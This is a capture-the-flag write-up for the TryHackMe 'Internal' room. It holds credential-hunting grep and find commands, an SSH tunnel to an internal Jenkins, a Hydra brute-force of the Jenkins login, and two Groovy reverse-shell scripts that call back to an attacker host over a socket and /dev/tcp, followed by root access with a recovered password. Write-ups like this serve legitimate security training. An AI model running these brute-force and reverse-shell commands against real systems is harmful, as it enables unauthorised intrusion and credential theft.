Tryhackme - Internal - THE HARD WAY

Goal: Boot to Root - The hard way.

1. Enumerations: Same as Internal Easy Way

2. Privilege Escalation: THE HARD WAY

Oh boy, where do I start?

Now let supposed that PwnKit doesn't work at all (which it does).

And let supposed that harvesting credentials by enumerating text files is the only way to get to root. Trỵhackme - Internal the hard way is based on the fact that this victim machine might be harden, and we may not have any way to get to root other than get into the Docker container and get our credential lying inside of an obfuscated text file.

We start with enumerating the directory around us.

# A few good enumerating commands from a friend:
#1. Obvious dirs
ls -lah /opt /var/backups /srv /tmp 2>/dev/null
ls -lah /opt /srv /tmp /home /etc /var 2>/dev/null 
find /home -maxdepth 2 -type f -size -128k -printf "%M %u %p\n" 2>/dev/null

#2. Colon grep
grep -RIn --exclude-dir={proc,sys,dev,run} -E '^[[:alnum:]._-]{1,30}:[[:graph:]]{1,30}$' / 2>/dev/null | head

# 3. Tiny txt/bak/old
find / -type f -size -128k \( -iname "*.txt" -o -iname "*.bak" -o -iname "*.old" -o -iname "*.conf" \) -readable -exec ls -lah {} + 2>/dev/null | head -n 40

# 4. ZIP/TAR creds
find / -type f -size -5M -regextype posix-extended -regex '.*\.(zip|tar|gz|bz2|7z|rar)$' -readable -print 2>/dev/null | head

# 5. Files containing the string 'user1' (change accordingly)
grep -RIl "user1" / 2>/dev/null

# 6. Same as 5. but faster
grep -RIl "user1" /opt /srv /tmp /home /etc /var 2>/dev/null

# 7. Files named with 'user1'
find / -type f -iname "*user1*" 2>/dev/null

# 8. Files owned by 'user1'
find / -user user1 2>/dev/null

# 9. Find password
grep -R "password" /tmp /etc /opt /home 2>/dev/null

For this lab command 1.1 and 2 works like a charm!

Command 1.1: Pointed out the file right on top:

www-data@internal:/$ ls -lah /opt /var/backups /srv /tmp 2>/dev/null 
ls -lah /opt /var/backups /srv /tmp 2>/dev/null 
/opt:
total 16K
drwxr-xr-x  3 root root 4.0K Aug  3  2020 .
drwxr-xr-x 24 root root 4.0K Aug  3  2020 ..
drwx--x--x  4 root root 4.0K Aug  3  2020 containerd
-rw-r--r--  1 root root  138 Aug  3  2020 wp-save.txt # Jackpot

/srv:
total 8.0K
drwxr-xr-x  2 root root 4.0K Feb  3  2020 .
drwxr-xr-x 24 root root 4.0K Aug  3  2020 ..

/tmp:
total 8.0K
drwxrwxrwt  2 root root 4.0K Jun  3 07:50 .
drwxr-xr-x 24 root root 4.0K Aug  3  2020 ..

/var/backups:
total 764K
drwxr-xr-x  2 root root   4.0K Aug  9  2020 .
drwxr-xr-x 14 root root   4.0K Aug  3  2020 ..
-rw-r--r--  1 root root    50K Aug  9  2020 alternatives.tar.0
-rw-r--r--  1 root root    38K Aug  3  2020 apt.extended_states.0
-rw-r--r--  1 root root   3.9K Aug  3  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root    437 Aug  3  2020 dpkg.diversions.0
-rw-r--r--  1 root root    207 Aug  3  2020 dpkg.statoverride.0
-rw-r--r--  1 root root   635K Aug  3  2020 dpkg.status.0
-rw-------  1 root root    746 Aug  3  2020 group.bak
-rw-------  1 root shadow  625 Aug  3  2020 gshadow.bak
-rw-------  1 root root   1.6K Aug  3  2020 passwd.bak
-rw-------  1 root shadow 1.1K Aug  3  2020 shadow.bak

Command 2: We don't even need to open the file:

www-data@internal:/$ grep -RIn --exclude-dir={proc,sys,dev,run} -E '^[[:alnum:]._-]{1,30}:[[:graph:]]{1,30}$' / 2>/dev/null | head
<._-]{1,30}:[[:graph:]]{1,30}$' / 2>/dev/null | head
/opt/wp-save.txt:5:aubreanna:bubb1XXXXXXXX # JACKPOT #Hidden password
/snap/core/9665/etc/apt/apt.conf.d/01autoremove-kernels:2:APT::NeverAutoRemove
/snap/core/9665/etc/group:1:root:x:0:
/snap/core/9665/etc/group:2:daemon:x:1:
/snap/core/9665/etc/group:3:bin:x:2:
/snap/core/9665/etc/group:4:sys:x:3:
/snap/core/9665/etc/group:5:adm:x:4:syslog
/snap/core/9665/etc/group:6:tty:x:5:
/snap/core/9665/etc/group:7:disk:x:6:
/snap/core/9665/etc/group:8:lp:x:7:

Navigating to the home directory reveals the user.txt flag and a file named “jenkins.txt.” This file hints that there is an internal Jenkins server running on a 172.17.0.2:8080 address internally.

aubreanna@internal:~$ ls -la
total 56
drwx------ 7 aubreanna aubreanna 4096 Aug  3  2020 .
drwxr-xr-x 3 root      root      4096 Aug  3  2020 ..
-rwx------ 1 aubreanna aubreanna    7 Aug  3  2020 .bash_history
-rwx------ 1 aubreanna aubreanna  220 Apr  4  2018 .bash_logout
-rwx------ 1 aubreanna aubreanna 3771 Apr  4  2018 .bashrc
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .cache
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .gnupg
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .local
-rwx------ 1 root      root       223 Aug  3  2020 .mysql_history
-rwx------ 1 aubreanna aubreanna  807 Apr  4  2018 .profile
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .ssh
-rwx------ 1 aubreanna aubreanna    0 Aug  3  2020 .sudo_as_admin_successful
-rwx------ 1 aubreanna aubreanna   55 Aug  3  2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3  2020 user.txt
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080

Now let's setup our ssh tunnel at 10000:

ssh -L 10000:172.17.0.2:8080 aubreanna@10.10.15.210

(I always forgot this command so I will explain to myself the command again, ignore these 2 lines below)

ssh -L 10000:172.17.0.2:8080 aubreanna@10.10.15.210
#    ^    ^          ^                 ^
#param..|l.port|internalnet|same as original ssh

┌──(kali㉿kali)-[~]
└─$ ssh -L 10000:172.17.0.2:8080 aubreanna@10.10.15.210
aubreanna@10.10.15.210's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jun  3 08:59:47 UTC 2025

  System load:  0.01              Processes:              149
  Usage of /:   63.7% of 8.79GB   Users logged in:        0
  Memory usage: 42%               IP address for eth0:    10.10.15.210
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jun  3 08:55:03 2025 from [YOUR IP]
aubreanna@internal:~$ 

Now to bruteforce Jenkins, we have to study its response:

HTTP/1.1 302 Found

Date: Tue, 03 Jun 2025 09:12:02 GMT

X-Content-Type-Options: nosniff

Set-Cookie: JSESSIONID.a31bd846=node0687h1wkmuo4r10e7witvipt5u53.node0; Path=/; HttpOnly

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Path=/; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; HttpOnly

Location: http://localhost:10000/loginError

Content-Length: 0

Server: Jetty(9.4.30.v20200611)

Notice this: http://localhost:10000/loginError this will be our input into hydra (Why hydra you ask? because I'm prepping for OSCP, normally I would CAIDO and filter out things but... well rules of the land it is. For what I know, OSCP banned CAIDO. I wish they didn't.).

Next let's study the POST request we send:

POST /j_acegi_security_check HTTP/1.1
Host: localhost:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: http://localhost:10000
Connection: keep-alive
Referer: http://localhost:10000/loginError
Cookie: JSESSIONID.a31bd846=node012qfv39fs1rrpyg3c8fqn48600.node0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

j_username=admin&j_password=&from=%2F&Submit=Sign+in

Build the hydra command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError" -s 10000 -V

Remember not to use 127.0.0.1:10000 and you MUST add -s 10000 or it will crashed.

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://[127.0.0.1:10000]:80/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError
[ERROR] could not resolve address: 127.0.0.1:10000
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-03 16:27:46

OUCH.

Anyway,

┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError" -s 10000 -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-03 16:32:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://127.0.0.1:10000/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
...
...
...
...
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "thomas" - 107 of 14344399 [child 9] (0/0)
[10000][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-03 16:32:18

There are 2 ways to get a shell:

1. Normal Shell:

Press New Item

Enter New Item Name and pick Multi-configuration project:

Scroll down at Build and pick Execute shell and enter your shell:

You'd probably wonder why I crossed these out, because at the time of writing this line I tried 20 reverse shell and failed every single one of it, Jenkins keep exit on my shell and I don't know why.

Until a friend explained:

---

In a Nutshell

• Build Step → parent = /bin/sh /tmp/jenkinsXYZ.sh → Jenkins kills all children when /tmp/jenkinsXYZ.sh exits → reverse shell dies.

• Script Console → parent = Jenkins’s Groovy/JVM → no build-wrapper to exit → your shell lives on until you close it.

That’s why every time you tried a “live bash –i >/dev/tcp/…” inside a pipeline, it connected briefly and then vanished—because Jenkins automatically reaps it once that step finishes.

---

I've also asked why on a Windows Server, I used this trick without being killed, they explained:

On Windows: Jenkins’s Windows agent launcher does not automatically kill every child process when your PowerShell step ends, so your PS reverse shell remains alive.

---

So anyway, Groovy script it is then.

Let's visit

http://localhost:10000/script

A few Groovy scripts:

String host="[YOUR IP]";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

// ─── REVERSE‐SHELL SNIPPET ──────────────────────────────────────────────
// Change the IP and port below to match your Kali listener.
String host = "[YOUR IP]"
int    port = 4444

// Build and execute a bash command that:
//   1) does “exec 5<>/dev/tcp/$host/$port” to open a single socket on FD 5
//   2) runs a “cat <&5 | while read line; do $line 2>&5 >&5; done” loop,
//      which reads any command you type and executes it in bash, sending
//      both stdout and stderr back over FD 5
def bashCommand = [
  "/bin/bash",
  "-c",
  "exec 5<>/dev/tcp/${host}/${port}; " +
  "cat <&5 | while read line; do \$line 2>&5 >&5; done"
]
def proc = Runtime.getRuntime().exec(bashCommand as String[])
proc.waitFor()
// ────────────────────────────────────────────────────────────────────────

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444

listening on [any] 4444 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.15.210] 43118
script /dev/null -c bash #Upgrading shell
Script started, file is /dev/null #Upgrading shell
jenkins@jenkins:/$ grep -RIn --exclude-dir={proc,sys,dev,run} -E '^[[:alnum:]._-]{1,30}:[[:graph:]]{1,30}$' / 2>/dev/null | head
/opt/note.txt:6:root:tr0ub13XXXXXXXXX #Hidden password
/var/lib/dpkg/info/base-passwd.preinst:7:root:*:0:0:root:/root:/bin/bash
/var/lib/dpkg/info/base-passwd.preinst:11:sync:*:4:65534:sync:/bin:/bin/sync
/var/lib/dpkg/info/base-passwd.preinst:30:root:*:0:
/var/lib/dpkg/info/base-passwd.preinst:31:daemon:*:1:
/var/lib/dpkg/info/base-passwd.preinst:32:bin:*:2:
/var/lib/dpkg/info/base-passwd.preinst:33:sys:*:3:
/var/lib/dpkg/info/base-passwd.preinst:34:adm:*:4:
/var/lib/dpkg/info/base-passwd.preinst:35:tty:*:5:
/var/lib/dpkg/info/base-passwd.preinst:36:disk:*:6:
jenkins@jenkins:/$ 

Now we could just:

┌──(kali㉿kali)-[~]
└─$ ssh root@10.10.15.210   
root@10.10.15.210's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jun  3 11:21:51 UTC 2025

  System load:  0.0               Processes:              167
  Usage of /:   63.7% of 8.79GB   Users logged in:        1
  Memory usage: 49%               IP address for eth0:    10.10.15.210
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug  3 19:59:17 2020 from 10.6.2.56
root@internal:~# cat /home/aubreanna/user.txt
THM{int3XXXXXXXXXXXXX #hidden
root@internal:~# cat /root/root.txt 
THM{d0XXXXXXXXXXXXXXX #hidden
root@internal:~# 

This is the hard way, the true way to do this room. I hope you would enjoy my write-up as much as I writing it.

Have a good day.